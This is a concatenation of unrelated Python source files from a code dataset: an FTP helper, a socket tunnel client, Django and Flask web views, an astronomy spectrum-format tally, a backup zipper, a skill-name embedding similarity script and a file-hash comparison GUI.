# print "上传失败!"
# print "%s 上传成功。" % file_name
#
# def upload(self,full_path_file_name):
# new_ftp = MyFtp()
# new_ftp.login()
#
# file_name = os.path.basename(full_path_file_name)
# with open(full_path_file_name,'rb') as f:
# try:
# new_ftp.ftp.storbinary('STOR ' + file_name,
# f,
# self.blocksize,
# self.callback_handle(file_name))
#
# except ftplib.error_perm :
# print "上传失败!"
# print "%s 上传成功。" % file_name
#
# def callback_handle(self,file_name):
# print "%s 上传中..." % file_name
# 测试
# file_path = '/home/l/app/learning/wangpan/wp_resource/articles_file/1/downloaded_files/chrome.part4.rar'
#
# dir = '/home/l/app/learning/wangpan/wp_resource/articles_file/1/unrared_files'
#
# cmd = '/usr/bin/unrar x ' + file_path +' ' + dir
#
# command = ShellCommand(cmd)
# # command.run(timeout=10)
# # command.run(timeout=1)
#
#
# thread = threading.Thread(target=command.run,kwargs={'timeout':3})
# thread.setDaemon(True)
# thread.start()
# print 'a'
# time.sleep(1)
# print '1'
# thread.join(2)
# print '2'
|
21,555 | 77401655f8388629614da367289268edc873a14a | import sys
# Smoke-test for the local `survae` package: sample a random matrix and
# print it together with its Gram matrix.
sys.path.append(".")  # make the sibling `survae` package importable
import survae
from jax import numpy as jnp, random
import jax

# Deterministic JAX PRNG; split so `key` could be used independently.
rng = random.PRNGKey(4)
rng, key = random.split(rng)
# NOTE(review): survae.rvs presumably draws a random variate of size 4 --
# confirm against the package; nothing here pins its shape.
m = survae.rvs(rng, 4)
print(m)
print(m.dot(m.T))  # Gram matrix m @ m.T
21,556 | 86dd59813e028e18d1dbb96071aed9ef03bdb469 | # -*- coding: utf-8 -*-
#author:ZJW
import json
#import jks
import ssl
import struct
import time
import socket
import select
import types
import thread
import threading
import UtilFunc
import Log
from constant import *
# from OpenSSL import SSL
# from OpenSSL.crypto import load_pkcs12,FILETYPE_ASN1,load_certificate,load_privatekey
#
#
# def jksfile2context(jksfile, passphrase, certfile):
# keystore = jks.KeyStore.load(jksfile, passphrase)
# p12 = load_pkcs12(file(certfile, 'rb').read(), passphrase)
# trusted_certs = [load_certificate(FILETYPE_ASN1, cert.cert)
# for cert in keystore.certs]
# ctx = SSL.Context(SSL.TLSv1_METHOD)
# ctx.set_options(SSL.OP_NO_TLSv1)
# ctx.use_privatekey(p12.get_privatekey())
# ctx.use_certificate(p12.get_certificate())
# ctx.check_privatekey()
# # for ca in p12.get_ca_certificates():
# # ctx.add_client_ca(ca)
# for cert in trusted_certs:
# ctx.get_cert_store().add_cert(cert)
# return ctx
#
# def verify_cb(conn, cert, errnum, depth, ok):
# # This obviously has to be updated
# print 'Got certificate: %s' % cert.get_subject()
# return ok
class NetTunnel:
    """Client side of a framed TCP (optionally TLS) message tunnel.

    Wire format per frame: 2-byte magic code, 2-byte message type, 4-byte
    body length, then the (JSON) body; an 8-byte uid may be prepended to
    the body.  Python 2 code (`thread` module, `except X, e` syntax).
    """

    def __init__(self):
        self.name = 'NetTunnel'          # key into MAGICCODE and log tag
        self._stop = True                # True until connect() succeeds
        self.msglist = []                # messages queued while disconnected
        self.connectTime = None          # last time we heard from the server
        self.pingCode = HPING            # keep-alive message type
        self.errCode = TIMEOUT           # last connection error code
        self.mutex = threading.Lock()    # serialises socket sends
        self.methods = {}                # msgType -> handler-method-name map
        # NOTE(review): self.magicCode (used by _checkMagicCode) is never set
        # here -- presumably assigned by a subclass; confirm.

    def _onConnectDown(self, retry=True):
        # Tear the connection down and optionally reconnect after 10 seconds.
        if self._stop: return
        self.stop()
        if retry:
            Log.info('[%s]Server Connection Disconnect! ReTry 10s Later!'%self.name)
            time.sleep(10)
            thread.start_new_thread(self.connect,(self.host, self.port, {}, True))

    def _onAccept(self,msg):
        # Hook invoked once the server accepts the connection.
        Log.info('[%s]Server Connect Successfull!'%self.name)

    def _onPingAck(self, msg):
        # Server answered our ping: refresh the liveness timestamp.
        self.connectTime = time.time()

    def _packMessage(self, body=None, msgType=None, uid=None):
        """Serialise one frame: magic, [type], length, [uid], [body]."""
        buf = struct.pack(FORMAT_H, MAGICCODE[self.name])
        if msgType:
            buf += struct.pack(FORMAT_H, msgType)
        if body:
            if not isinstance(body,types.StringType):
                body = json.dumps(body)  # non-string bodies go over the wire as JSON
            body_length = len(body)
            if uid:
                # uid is counted as part of the body length.
                buf += struct.pack(FORMAT_I, body_length + UIDLEN)
                buf += struct.pack(FORMAT_Q, uid)
            else:
                buf += struct.pack(FORMAT_I, body_length)
            buf += struct.pack(FORMAT_S%body_length, body)
        else:
            buf += struct.pack(FORMAT_I, 0)
        return buf

    def _checkMagicCode(self, msg):
        # Validate the 2-byte frame preamble against self.magicCode.
        (code,) = struct.unpack(FORMAT_H, msg[:MAGICLEN])
        if code == self.magicCode:
            return True
        Log.error("[%s]Receive Message Failed! MagicCode Error!"%self.name)
        return False

    def _revData(self, length):
        # Read exactly `length` bytes (recv may return fewer than asked).
        data, buff_len = '', 0
        if length != 0:
            while buff_len < length:
                sub_data = self.conn.recv(length - buff_len)
                data += sub_data
                buff_len = len(data)
        return data

    def _onLine(self, params):
        # Payload sent with the initial CONNECT frame; subclasses override.
        return {}

    def connect(self, host, port, params={}, retry=False, key=None, cert=None):
        """Open the tunnel; return True on ACCEPT, False otherwise.

        NOTE(review): mutable default ``params={}`` is shared across calls.
        """
        Log.info('[%s]Server Connecting! HOST[%s] PORT[%s]'%(self.name, host, port))
        try:
            self.host, self.port = host, port
            conn = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
            if key and cert:
                # TLS path with a client certificate from a PKCS#12 bundle.
                # NOTE(review): load_pkcs12 / SSL / verify_cb come from the
                # commented-out pyOpenSSL imports above -- this branch would
                # raise NameError as the file stands; confirm.
                self.key, self.cert = key, cert
                p12 = load_pkcs12(file(key, 'rb').read(), 'elastos')
                ctx = SSL.Context(SSL.TLSv1_METHOD)
                ctx.set_verify(SSL.VERIFY_PEER, verify_cb)
                ctx.use_privatekey(p12.get_privatekey())
                ctx.use_certificate(p12.get_certificate())
                ctx.load_verify_locations(self.cert)
                # ctx = jksfile2context(self.key,'elastos',self.cert)
                self.conn = SSL.Connection(ctx, conn)
                self.conn.set_connect_state()
                self.conn.settimeout(90)
            else:
                self.conn = conn
            self.conn.connect((host, port))
            self.conn.send(self._packMessage(self._onLine(params), CONNECT))
            msg = self.conn.recv(MESSAGEBUF)
            if self._checkMagicCode(msg[:MAGICLEN]):
                (msgType, length) = struct.unpack(FORMAT_R, msg[MAGICLEN:(LENGTH_R+MAGICLEN)])
                if msgType:
                    if msgType == ACCEPT:
                        # Handshake done: start reader + keep-alive threads.
                        self.connectTime = time.time()
                        self.host = host
                        thread.start_new_thread(self._listening, ())
                        thread.start_new_thread(self._loop, ())
                        self._stop = False
                        self._onAccept(msg[(LENGTH_R+MAGICLEN):])
                        return True
                    elif msgType == REFUSE:
                        (errCode,info) = self.parseData(msg[(LENGTH_R+MAGICLEN):], ('reason','message'))
                        Log.error('[%s]Connect Refuse! ErrCode[%s] Info[%s]'%(self.name,errCode,info))
                        self.errCode = errCode
                    else:
                        Log.error('[%s]Create Connection Failed! Receive Type Error!'%self.name)
                else:
                    Log.error('[%s]Create Connection Failed! Receive Message Error!'%self.name)
        except Exception,e:
            Log.exception('[%s]Connect Server[%s] Exception[%s]'%(self.name,host,e))
        # Any non-ACCEPT outcome falls through here: mark stopped, close,
        # and optionally retry forever with a 10s backoff.
        self._stop = True
        if self.conn: self.conn.close()
        if retry:
            Log.info('[%s]Server Connect Failed! ReTry 10s Later!'%self.name)
            time.sleep(10)
            self.connect(host, port, params, retry, key, cert)
        return False

    def receive(self, msgType, msg):
        """Dispatch an inbound frame to the handler named in self.methods."""
        Log.info('[%s]Receive Message From Server! msgType:[%s]'%(self.name,msgType))
        try:
            method = self.methods.get(msgType,None)
            if method:
                self.connectTime = time.time()
                # NOTE(review): getattr(self, method)(msg) would be safer
                # than exec here.
                exec('self.%s(msg)'%method)
        except Exception,e:
            Log.exception('[%s]Receive Exception! Reason[%s]'%(self.name,e))
        return

    def send(self, msg=None, msgType=None, uid=None):
        """Frame and send a message; queue it if currently disconnected."""
        if self.isStop():
            # Not connected: drop pings, queue everything else for later.
            if msgType in [RPING,HPING]: return
            self.msglist.append({'msg':msg,'type':msgType,'uuid':uid})
            return
        buf = self._packMessage(msg, msgType, uid)
        start, end = 0, len(buf)
        self.mutex.acquire()
        try:
            # Loop because socket.send may write only part of the buffer.
            while start < end:
                length = self.conn.send(buf[start:])
                start += length
            Log.info('[%s]Send Message To Server! type[%s] time[%s]'%(self.name,msgType, UtilFunc.getUtcTime()))
        except socket.error, e:
            Log.error('[%s]Server Connection Error! Reason[%s]'%(self.name,e))
            self._onConnectDown()
        except Exception, e:
            Log.info('[%s]SendMessage To Server Except! Reason[%s]'%(self.name,e))
        finally:
            self.mutex.release()

    def stop(self):
        """Mark the tunnel stopped and close the socket."""
        self._stop = True
        if self.conn: self.conn.close()

    def isStop(self):
        # True while the tunnel is not connected.
        return self._stop

    def parseData(self, msg, keys=[]):
        """Decode a JSON body; return the whole dict, or a tuple of `keys`.

        Missing keys come back as '' in the tuple form.
        """
        (msg,) = struct.unpack(FORMAT_S%len(msg), msg)
        bodyData = json.loads(msg)
        if keys:
            ret = []
            for key in keys:
                ret.append(bodyData.get(key,''))
            return tuple(ret)
        else:
            return bodyData

    def _listening(self):
        """Reader loop: select on the socket, decode frames, flush the queue."""
        while not self._stop:
            try:
                # NOTE(review): the third select result shadows the builtin
                # Exception inside this loop body.
                Input, Output, Exception=select.select([self.conn,],[],[self.conn,])
                if Exception:
                    for s in Exception:
                        if s == self.conn:
                            Log.exception("Connect[%s] Exception"%s.getpeername())
                    break
                for indata in Input:
                    if indata == self.conn:
                        # Read one full frame: magic, (type, length), body.
                        magicData = self._revData(MAGICLEN)
                        if not magicData or not self._checkMagicCode(magicData):
                            continue
                        buf = self._revData(LENGTH_R)
                        (msgType, length) = struct.unpack(FORMAT_R, buf)
                        data = self._revData(length)
                        self.receive(msgType, data)
                # Flush messages queued while we were offline.
                # NOTE(review): removes from msglist while iterating it.
                for msg in self.msglist:
                    self.send(msg.get('msg',None),msg.get('type',None),msg.get('uuid',None))
                    self.msglist.remove(msg)
            except socket.error, e:
                Log.exception('Listenning Except! Server[%s], Reason[%s]'%(self.name,e))
                break
        if not self._stop:
            self._onConnectDown()

    def _loop(self, delay = PINGDELAY):
        """Keep-alive loop: ping every `delay`s; tear down a silent link."""
        start = time.time()
        while not self._stop:
            if time.time() - start >= delay:
                self.send(None, self.pingCode)
                start = time.time()
            if time.time() - self.connectTime > CDELAY:
                self._onConnectDown()
            time.sleep(0.1)
|
21,557 | 004dd7775d681706ca50add7dbc368ff01bf1afa | from django.http import HttpResponse
from django.shortcuts import render
from upload_image.models import Image
# Create your views here.
def index(request):
    """Image upload view: GET renders the form, POST stores the upload."""
    if request.method == 'GET':
        return render(request, 'upload_image/index.html', locals())
    if request.method == 'POST':
        # NOTE(review): raises KeyError if 'username' is missing from the
        # session or 'myfile' from the POST -- confirm callers guarantee both.
        username = request.session['username']
        afile = request.FILES['myfile']
        Image.objects.create(username=username, myfile=afile)
        # return render(request, 'upload_image/index.html', locals())
        return HttpResponse('上传成功')
|
21,558 | a89ef8b097ce86cf59a6b0fe46ae320809c41635 | from astropy.io import ascii
from scripts.ingests.utils import *
from specutils import Spectrum1D
import astropy.units as u
from datetime import date
# Tally which specutils reader each spectrum in the SIMPLE database loads
# with (wcs1d-fits, Spex Prism, iraf, tabular-fits, ASCII), flag spectra
# whose wavelength axis cannot convert to micron, and write the groupings
# to dated .dat tables.
logger.setLevel(logging.DEBUG)

db = load_simpledb('SIMPLE.db', recreatedb=False)
data = db.inventory('2MASS J13571237+1428398',pretty_print= True)

# NOTE(review): this rebinds the name `date` from the datetime.date class
# (imported above) to today's date -- the class is unreachable afterwards.
date = date.today()

table = db.query(db.Spectra).table()
#print(table.info)

# Per-format tallies.
wcs1d_fits_tally = 0
spex_prism_tally = 0
iraf_tally = 0
tabularfits_tally = 0
fits_units = 0   # wcs1d-fits spectra whose wavelength won't convert to micron
spex_units = 0   # same, for Spex Prism spectra
ascii_tally = 0
not_working_tally = 0

not_working_errors = []  # prints out the errors for the ones that don't work
not_working_spectra = []
not_working_names = []
not_working_txt = []     # failing spectra that are .txt files
txt_names = []
txt_references = []
wcs1d_fits_spectra = []
wcs1d_fits_units_issue = []
wcs1d_fits_names = []
units_issue_names = []
spex_prism_spectra = []
spex_prism_names = []

# ASCII, iraf, tabular-fits, wcs1d-fits, Spex Prism, ecsv
for n, spectrum in enumerate(table):
    file = os.path.basename(spectrum['spectrum'])
    # NOTE(review): despite the name, this is the file *extension*
    # (splitext()[1]), e.g. '.txt'.
    file_root = os.path.splitext(file)[1]
    length = len(table)
    #print(n,spectrum[0])
    try:
        spec = Spectrum1D.read(spectrum['spectrum'], format='wcs1d-fits')
        wcs1d_fits_tally += 1
        wcs1d_fits_spectra.append(spectrum['spectrum'])
        wcs1d_fits_names.append(spectrum['source'])
        try:
            # Probe that the wavelength axis converts to micron.
            spec.wavelength.to(u.micron).value
        except:
            fits_units += 1
            wcs1d_fits_units_issue.append(spectrum['spectrum'])
            units_issue_names.append(spectrum['source'])
    except Exception as e_wcs1d:
        not_working_errors.append(f'wcs1d err: {e_wcs1d} \n')
        # Fall through the remaining readers, most-likely first.
        try:
            spec = Spectrum1D.read(spectrum['spectrum'], format='Spex Prism')
            spex_prism_tally += 1
            spex_prism_spectra.append(spectrum['spectrum'])
            spex_prism_names.append(spectrum['source'])
            try:
                spec.wavelength.to(u.micron).value
            except:
                spex_units += 1
        except Exception as e_spex:
            not_working_errors.append(f'spex prism err: {e_spex} \n')
            try:
                spec = Spectrum1D.read(spectrum['spectrum'], format='iraf')
                iraf_tally += 1
            except Exception as e_iraf:
                try:
                    spec = Spectrum1D.read(spectrum['spectrum'], format='tabular-fits')
                    tabularfits_tally += 1
                except Exception as e_tabular:
                    try:
                        spec = Spectrum1D.read(spectrum['spectrum'], format='ASCII')
                        ascii_tally += 1
                    except Exception as e_ascii:
                        # Nothing could read this spectrum.
                        not_working_errors.append(f'ascii err: {e_ascii} \n')
                        not_working_spectra.append(spectrum['spectrum'])
                        not_working_names.append(spectrum['source'])
                        not_working_tally += 1
                        if file_root == '.txt':
                            not_working_txt.append(spectrum['spectrum'])
                            txt_names.append(spectrum['source'])
                            txt_references.append(spectrum['reference'])

# Summary counts; the total should equal the database size.
print(f'wcs1d fits tally: {wcs1d_fits_tally}')
print(f'fits units broken: {fits_units}')
print(f'spex prism tally: {spex_prism_tally}')
print(f'spex units broken: {spex_units}')
print(f'iraf tally: {iraf_tally}')
print(f'tabularfits tally: {tabularfits_tally}')
print(f'ascii tally: {ascii_tally}')
print(f'not_working_tally: {not_working_tally}')
print(f'number of spectra in database: {length}')
print(f'total tally:{wcs1d_fits_tally + spex_prism_tally + iraf_tally + tabularfits_tally +ascii_tally +not_working_tally}')

# NOTE(review): Table is not imported explicitly here -- presumably pulled
# in by `from scripts.ingests.utils import *`; confirm.  All writes use
# overwrite=False, so re-running on the same day raises if the files exist.

# table for all not working spectra
data_not_working = Table([not_working_names, not_working_spectra],
                         names=('source', 'spectrum'))  # add column names source and url
ascii.write(data_not_working, f'not_working_table_{date}.dat', overwrite=False)

# table for not working .txt spectra
data_not_working_txt = Table([txt_names, not_working_txt, txt_references],
                             names=('source', 'spectrum', 'reference'))
ascii.write(data_not_working_txt, f'not_working_txt_table_{date}.dat', overwrite=False)

# table for wcs1d-fits spectra
data = Table([wcs1d_fits_names, wcs1d_fits_spectra],
             names=('source', 'spectrum'))
ascii.write(data, f'wcs1d_spectrum_table_{date}.dat', overwrite=False)

# table for wcs1d spectra w units errors
units_data = Table([units_issue_names, wcs1d_fits_units_issue],
                   names=('source', 'spectrum'))
ascii.write(units_data, f'wcs1d_convert_unit_table_{date}.dat', overwrite=False)

# table for spex prism spectra
spex_data = Table([spex_prism_names, spex_prism_spectra],
                  names=('source', 'spectrum'))
ascii.write(spex_data, f'spex_prism_table_{date}.dat', overwrite=False)

#plt.plot(spec.wavelength, spec.flux)
#plt.show()
|
21,559 | 6ea7ef09a94decd51abd80c1de294849d286c124 | import os
import re
import csv
import time
from os import sys
from sys import platform
import zipfile
# Back up a vhost's httpd tree into a dated zip and move it to the config
# domain's backups folder.  Usage: python script.py example.com standartdomain.com
if not platform == "linux" and not platform == "linux2":
    print('This script only works on Linux systems')
    quit()

if not len(sys.argv) == 3:
    print('Specify at least one parameter. $python script.py example.com standartdomainname.com')
    quit()
else:
    domainname = sys.argv[1]
    standartdomainname = sys.argv[2]

if not os.path.isdir('/var/www/' + domainname):
    print('This domain does not exist')
    quit()

# Build the archive under /var/tmp first, then move it into place.
zip_name = 'backup_' + domainname + '_' + time.strftime('%Y_%m_%d_%H_%M_%S') + '_manually.zip'
Zip = zipfile.ZipFile('/var/tmp/' + zip_name, 'a')
counter = 0
for dirname, dirs, filenames in os.walk('/var/www/' + domainname + '/httpd'):
    for filename in filenames:
        # BUG FIX: was `counter = counter + counter`, which always stays 0;
        # count each archived file instead.
        counter = counter + 1
        Zip.write(os.path.join(dirname, filename))
Zip.close()

# NOTE(review): domainname/standartdomainname come from argv and are
# interpolated into a shell command; they are constrained to existing
# /var/www entries above, but subprocess.run([...]) or shutil.move would
# avoid the shell entirely.
os.system('sudo mv /var/tmp/' + zip_name + ' /var/www/config.' + standartdomainname + '/httpd/backups/' + zip_name)
print(zip_name)
|
21,560 | de36e7e3beb29388d149a3b3b84406977ab064f0 |
# import urllib.request
# url="http://www.amazon.com/s?i=alexa-skills&bbn=13727921011&rh=n%3A13727921011%2Cp_n_date%3A14284927011&page=2&qid=1601731757&ref=sr_pg_3";
# opener.addheaders = [('User-agent', 'Mozilla/5.0')]
# uf = urllib.request.urlopen(url);
# html = uf.read();
# print (html);
# import requests
# headers = {'User-Agent': 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36'};
# page = requests.get("https://www.amazon.com/s?i=alexa-skills&bbn=13727921011&rh=n%3A13727921011%2Cp_n_date%3A14284927011&page=2&qid=1601731757&ref=sr_pg_3",headers)
# html_contents = page.text
# print(html_contents)
# import urllib
# opener = urllib.request.urlopen();
# opener.addheaders = [('User-agent', 'Mozilla/81.0.1')]
# response = opener.open('https://www.amazon.com/s?i=alexa-skills&bbn=13727921011&rh=n%3A13727921011%2Cp_n_date%3A14284927011&page=2&qid=1601731757&ref=sr_pg_3')
# html_contents = response.read()
import tensorflow_hub as hub
import tensorflow as tf
from nltk.corpus import wordnet as wn
import numpy as np
from sklearn.neighbors import BallTree
import matplotlib.pyplot as plt
def GUSE(item):
    """Embed one string with the module-level `embed` USE model as ndarray.

    NOTE(review): until `embed` is rebound to the hub model near the bottom
    of the file, this and the `embed` function below call each other and
    would recurse forever -- confirm the call order.
    """
    # return embed([item]).numpy().tolist();
    return embed([item]).numpy();
def embed(newSteps):
    """Embed each string in `newSteps` (lower-cased) via GUSE, one by one.

    Returns a list of per-item embedding arrays.
    NOTE(review): this function is shadowed later by
    `embed = hub.load(...)` and is unreachable by name after that.
    """
    tempEmbeeding=[];
    for item in newSteps:
        item=item.lower();
        tempembed=GUSE(item);
        tempEmbeeding.append(tempembed);
        # tempembed=GUSE(item);
        # tempEmbeeding.append(tempembed);
        # trueEmbeedingArrayBig=np.append(trueEmbeedingArrayBig,tempembed);
    return tempEmbeeding;
# def compare(input_From_User_Embedding,trueEmbeedingArrayBig):
# size=len(trueEmbeedingArrayBig)/512;
# resizedEmbedding=np.reshape(trueEmbeedingArrayBig,(int(size),512));
# tree = BallTree(resizedEmbedding, leaf_size=20) # doctest: +SKIP
# dist, ind = tree.query(input_From_User_Embedding, k=5)
# print(dist);
def compare(input_From_User_Embedding, trueEmbeedingArrayBig):
    """Return indices of the 10 nearest embeddings farther than 0.8.

    ``trueEmbeedingArrayBig`` is reshaped to (n, 512) and indexed with a
    BallTree; ``input_From_User_Embedding`` is the query batch (one row).
    Only neighbours whose distance exceeds the 0.8 threshold are kept,
    exactly as in the original loop.
    """
    num_vectors = int(len(trueEmbeedingArrayBig))
    matrix = np.reshape(trueEmbeedingArrayBig, (num_vectors, 512))
    neighbours = BallTree(matrix, leaf_size=20)  # doctest: +SKIP
    dist, ind = neighbours.query(input_From_User_Embedding, k=10)
    return [idx for d, idx in zip(dist[0], ind[0]) if d > 0.8]
def bert():
    """Build BERT Keras inputs and run a local hub layer (debug prints only)."""
    print('1');
    max_seq_length = 128  # Your choice here.
    input_word_ids = tf.keras.layers.Input(shape=(max_seq_length,), dtype=tf.int32,name="input_word_ids")
    input_mask = tf.keras.layers.Input(shape=(max_seq_length,), dtype=tf.int32, name="input_mask")
    segment_ids = tf.keras.layers.Input(shape=(max_seq_length,), dtype=tf.int32, name="segment_ids")
    # bert_layer = hub.KerasLayer("https://tfhub.dev/tensorflow/bert_en_uncased_L-24_H-1024_A-16/2",trainable=True)
    print('2');
    # NOTE(review): hard-coded absolute local path -- breaks on any other machine.
    bert_layer = hub.KerasLayer("/Users/senqiao/Desktop/533Project/bert_en_uncased_L-24_H-1024_A-16_2",trainable=True)
    print('3');
    pooled_output, sequence_output = bert_layer([input_word_ids, input_mask, segment_ids])
    print(pooled_output);
# Parse the scraped Alexa-skill listing, count duplicate skill names, then
# embed the unique names with the Universal Sentence Encoder and print the
# nearest-neighbour "similar skills" for each one.
Name_List=[];
Rating_List=[];
Avaiability_List=[];
Language_List=[];
Description_List=[];

# 100 page of featured
filename="ListofSkills.txt"
with open(filename, newline='') as Listfile:
    # `count` tracks the field position within each 6-line record:
    # 0=name, 2=rating-or-availability, 3=availability, 4=language,
    # 5=description (then reset).
    count=0;
    for line in Listfile:
        if line !='\n' and line!= 'Free Download\n':
            if count==0:
                Name_List.append(line);
            elif count==2 and 'Available' not in line:
                Rating_List.append(line);
            elif count==2 and 'Available' in line:
                # Unrated skill: the availability line arrives one early.
                Rating_List.append('');
                Avaiability_List.append(line);
                count=count+1;
            elif count==3:
                Avaiability_List.append(line);
            elif count==4:
                Language_List.append(line);
            elif count==5:
                Description_List.append(line);
                count=-1;
            count=count+1;

####################################################
# compare names: count how often each (normalised) name repeats.
unique={};
unique_array=[];
for i in Name_List:
    # if 'Jeopardy' in i:
    #     print (i);
    if i.replace('\n','').replace('!','').replace('.','').replace('(','').replace(')','') not in unique_array:
        unique_array.append(i.replace('\n','').replace('!','').replace('.','').replace('(','').replace(')',''))
        unique[i]=1;
    else:
        # NOTE(review): keyed by the *raw* name but deduplicated by the
        # normalised one -- a second raw spelling that normalises to an
        # existing entry would raise KeyError here; confirm.
        unique[i]=unique[i]+1;
print({k: v for k, v in sorted(unique.items(), key=lambda item: item[1])});

#####################################Graph bar
# fig = plt.figure()
# count = [];
# names = [];
# for k, v in unique.items():
#     count.append(k);
#     names.append(int(v));
# ax = fig.add_axes([0,0,1,1])
# ax.set_ylabel('Count');
# ax.set_xlabel('Unique Skill Names');
# ax.set_ylim(0, 25)
# ax.bar(count,names)
# plt.show()

#####################################################
# Google Universal Encoder -- NOTE: this rebinds `embed`, shadowing the
# helper function defined above.
# embed = hub.load("/universal-sentence-encoder_4/");
embed = hub.load("https://tfhub.dev/google/universal-sentence-encoder/1");
embed_array=embed(unique_array);
covert_embed=[];
for i in embed_array:
    covert_embed.append(i.numpy());
for j in range(len(covert_embed)):
    # print("ssssss1");
    print('Orginal Skill Name:');
    print(unique_array[j]);
    # unique_array
    appendme=[];
    appendme.append(covert_embed[j]);
    index=compare(appendme,covert_embed);
    Similar_array=[];
    for i in index:
        # print(i[1]);
        Similar_array.append(unique_array[i]);
    print('Similar Skills:');
    print(Similar_array);
################################################
# bert();
# unique_array=["Jeopardy Unofficial","Jeopardy"];
# embed = hub.load("/Users/senqiao/Desktop/Recomandation/universal-sentence-encoder_4/");
# embed_array=embed(unique_array);
# covert_embed=[];
# for i in embed_array:
# covert_embed.append(i.numpy());
# for j in range(len(covert_embed)):
# # print("ssssss1");
# print('Orginal:');
# print(unique_array[j]);
# # unique_array
# appendme=[];
# appendme.append(covert_embed[j]);
# index=compare(appendme,covert_embed);
# Similar_array=[];
# for i in index:
# # print(i[1]);
# Similar_array.append(unique_array[i]);
# print('Similar:');
# print(Similar_array);
|
21,561 | 159e4abcd3d3fa36a2850662f6114b721888f98d | import hashlib
import PySimpleGUI as sg
import os
import re
def hash(fname, method):
    """Return the hex digest of file `fname` using `method`.

    `method` is one of 'SHA1', 'MD5' or 'SHA256' (the GUI checkboxes
    below).  The file is read as binary chunks, so the digest matches
    external tools such as sha1sum / md5sum.

    NOTE: the function name shadows the builtin `hash`; kept for
    compatibility with the GUI code below that calls it.
    """
    # BUG FIX: the file was previously opened in *text* mode and re-encoded
    # to UTF-8 line by line, which crashes on binary files and can change
    # the digest through newline/encoding translation.  Hash raw bytes.
    digest = hashlib.new(method.lower())
    with open(fname, 'rb') as handle:
        for chunk in iter(lambda: handle.read(65536), b''):
            digest.update(chunk)
    return digest.hexdigest()
# PySimpleGUI front-end: pick two files and one or more hash algorithms,
# then print whether the files' digests match.
sg.change_look_and_feel('LightBlue3')

# values[] index map: 0 = File 1 path, 1 = SHA1 box, 2 = MD5 box,
#                     3 = File 2 path, 4 = SHA256 box.
layout = [
    [sg.Text('File 1: '),
     sg.InputText(),
     sg.FileBrowse(),
     sg.Checkbox('SHA1'),
     sg.Checkbox('MD5')],
    [sg.Text('File 2: '),
     sg.InputText(),
     sg.FileBrowse(),
     sg.Checkbox('SHA256')],
    [sg.Output(size=(80,20))],
    [sg.Submit(), sg.Cancel()]
]

window = sg.Window('Compare Files', layout)

while True:
    event, values = window.read()
    if event in (None, 'Exit', 'Cancel'):
        break
    if event=='Submit':
        # print(event, values)
        filepaths = []
        methods = []
        file1 = None
        file2 = None
        valid = None
        if values[0] and values[3]:
            # print(values[0])
            # print(values[3])
            # Loose sanity check that each entry looks like /path/name.ext.
            file1 = re.findall('\/.+\.+.', values[0])
            file2 = re.findall('\/.+\.+.', values[3])
            valid = 1
        if (not file1 and file1 is not None) or not os.path.isfile(values[0]):
            print('Error: Invalid filepath for File 1')
            valid = 0
        elif (not file2 and file2 is not None) or not os.path.isfile(values[3]):
            print('Error: Invalid filepath for File 2')
            valid = 0
        elif not (values[1] or values[2] or values[4]):
            print('Error: No algorithm selected')
            valid = 0
        elif valid == 1:
            print('Info: Valid paths entered')
            if values[1]:
                methods.append('SHA1')
            if values[2]:
                methods.append('MD5')
            if values[4]:
                methods.append('SHA256')
            filepaths.append(values[0]) # File 1
            filepaths.append(values[3]) # File 2
            # print(methods)
            # print(filepaths)
            for method in methods:
                print(f'>> {method} Comparison')
                # NOTE(review): each file is hashed twice per method (once
                # for display, once for the comparison below).
                print(f'Hash of File 1 is {hash(filepaths[0], method)}')
                print(f'Hash of File 2 is {hash(filepaths[1], method)}')
                if hash(filepaths[0], method) == hash(filepaths[1], method):
                    print(f'The two files are identical relying on {method} method\n')
                else:
                    print(f'The two files are different relying on {method} method\n')
        else:
            print('Error: Please choose 2 files')
21,562 | e7b6ca2caaa9cb74061b95a1991662bffe460a51 | from flask import Flask, render_template, request, redirect
from mysqlconnection import MySQLConnection
app = Flask(__name__)
mysql = MySQLConnection(app, 'users')
@app.route('/')
def redirect_root():
    """Send the bare root URL to the users index."""
    return redirect('/users')
@app.route('/users')
def index():
    """List all users with id, full name, email and formatted creation date."""
    query = mysql.query_db("SELECT id, concat(first_name, ' ', last_name) as full_name, email, DATE_FORMAT(created_at, '%M %D, %Y') AS created_at FROM users")
    return render_template('index.html', query=query)
@app.route('/users/new')
def new():
    """Render the blank new-user form (submits to /users/create)."""
    return render_template('users_new.html')
@app.route('/users/<id>/edit')
def edit(id):
    """Render the edit form for one user.

    SECURITY FIX: the URL-supplied id was formatted straight into the SQL
    string, allowing SQL injection.  Bind it as a named parameter instead
    (the same mechanism create() already uses).
    """
    query = mysql.query_db("SELECT * FROM users WHERE id = :id", {'id': id})
    return render_template('users_edit.html', id=id, query=query)
@app.route('/users/<id>', methods=['GET'])
def show(id):
    """Show one user's profile page.

    SECURITY FIX: bind the URL-supplied id as a named parameter instead of
    formatting it into the SQL string (SQL injection).
    """
    query = mysql.query_db(
        "SELECT concat(first_name, ' ', last_name) as full_name, email, DATE_FORMAT(created_at, '%M %D, %Y') AS created_at FROM users WHERE id = :id",
        {'id': id})
    return render_template('users_show.html', id=id, query=query)
@app.route('/users/<id>', methods=['POST'])
def update(id):
    """Redirect back to the user's page after an update POST.

    BUG FIX: the target was '/users/{}}'.format(id) -- the stray unescaped
    '}' makes str.format raise "ValueError: Single '}' encountered in
    format string" on every call.
    """
    return redirect('/users/{}'.format(id))
@app.route('/users/create', methods=['POST'])
def create():
    """Insert a new user from the form, then redirect to their page.

    SECURITY FIX: the email used to look the new row back up was formatted
    straight into the SQL string; bind it as a named parameter, like the
    INSERT already does.
    """
    query = "INSERT INTO users (first_name, last_name, email, created_at, updated_at) VALUES (:first_name, :last_name, :email, NOW(), NOW())"
    data = {
        'first_name': request.form['first_name'],
        'last_name': request.form['last_name'],
        'email': request.form['email']
    }
    mysql.query_db(query, data)
    id_result = mysql.query_db("SELECT id FROM users WHERE email = :email",
                               {'email': request.form['email']})
    return redirect('/users/{}'.format(id_result[0]['id']))
@app.route('/users/<id>/destroy')
def destroy(id):
    """Delete the given user and return to the index.

    SECURITY FIX: bind the URL-supplied id as a named parameter instead of
    formatting it into the DELETE statement (SQL injection).
    """
    mysql.query_db("DELETE FROM users WHERE id = :id", {'id': id})
    return redirect('/users')
# Start the dev server; debug=True enables the reloader and tracebacks.
app.run(debug=True)
|
